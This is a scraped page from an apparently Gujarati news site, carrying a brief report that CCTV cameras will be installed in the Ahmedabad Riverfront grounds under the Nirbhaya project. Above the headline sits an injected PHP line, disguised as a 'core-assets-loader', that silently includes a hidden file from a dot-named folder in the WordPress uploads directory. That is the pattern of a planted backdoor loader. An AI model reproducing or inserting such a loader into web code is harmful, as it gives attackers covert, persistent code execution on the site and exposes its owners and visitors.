add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); અમદાવાદ: રિવરફ્રન્ટ પર બેસતા પ્રેમી પંખીડાઓ હવે થઈ જાઓ સાવધાન – SOCH INDIA
Menu

देश
અમદાવાદ: રિવરફ્રન્ટ પર બેસતા પ્રેમી પંખીડાઓ હવે થઈ જાઓ સાવધાન

nobanner

શહેરના રિવરફ્રન્ટ (Riverfront) પર બેસતા પ્રેમી પંખીડાઓ હવે સાવધાન થઈ જજો….કારણ કે રિવરફ્રન્ટના આંતરિક મેદાનમાં પણ CCTV લાગશે. નિર્ભયા પ્રોજેકટ હેઠળ હવે બાજ નજર રાખવામાં આવશે.

પોલીસ વિભાગને મળતા નિર્ભયા ફંડ હેઠળ પ્રોજેકટ અમલમાં મુકાશે. શહેર પોલીસ અને AMC દ્વારા વિચારણા શરૂ થઈ છે. રિવરફ્રન્ટના પૂર્વ-પશ્ચિમ બન્ને કિનારાને પ્રોજેકટમાં આવરી લેવામાં આવશે. હાલ જે CCTV લાગેલા છે તે ફક્ત રોડના ટ્રાફિકને કવર કરે છે. જ્યારે નિર્ભયા પ્રોજેકટ હેઠળ વધુ આધુનિક કેમેરા મુકવામાં આવશે.

આ આધુનિક કેમેરા મૂકવામાં આવશે ત્યારબાદ કોઈપણ શંકાસ્પદ ગતિવિધિ ત્રીજી આંખથી બચી નહીં શકે.